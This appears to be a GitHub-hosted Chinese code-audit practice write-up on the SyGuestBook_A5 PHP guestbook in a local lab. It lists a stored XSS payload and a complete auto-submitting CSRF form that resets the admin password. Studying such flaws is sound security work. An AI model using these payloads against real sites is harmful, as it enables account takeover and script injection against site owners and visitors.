Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
69 lines (50 sloc) 1.79 KB
layout author tags
post
fragrant
php 代码审计

代码审计练习

0x01 准备

  • Windows 10、PhpStudy
  • PHP基础、Mysql基础、VSC
  • SyGuestBook_A5.zip

0x02 漏洞

0x001 留言板Stored Xss

whoami
2453465
if i were a boy!<img/src/onerror=alert(/aa/)>

0x002 后台管理员回复/审核出存储型XSS

0x003 修改密码处存在CSRF漏洞

SyGuestCSRF.html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body onload="document.forms[0].submit();">
<form  id=form1 name=form1 action="http://192.168.122.120/code_audit/SyGuestBook_A5/index.php?c=Administrator&a=update&id=1&submit=aaa" method=post>
  <input name="username" type="hidden" value="admin">
  <input name="pass_new" type="hidden" value="admin123">
  <input name="admin" type="hidden" value="admin">
  <input name="gid" type="hidden" value="0">
</body>
</html>

Open Link: http://10.0.0.5:2398/SyGuestCSRF.html the password will be changed to admin123

You can’t perform that action at this time.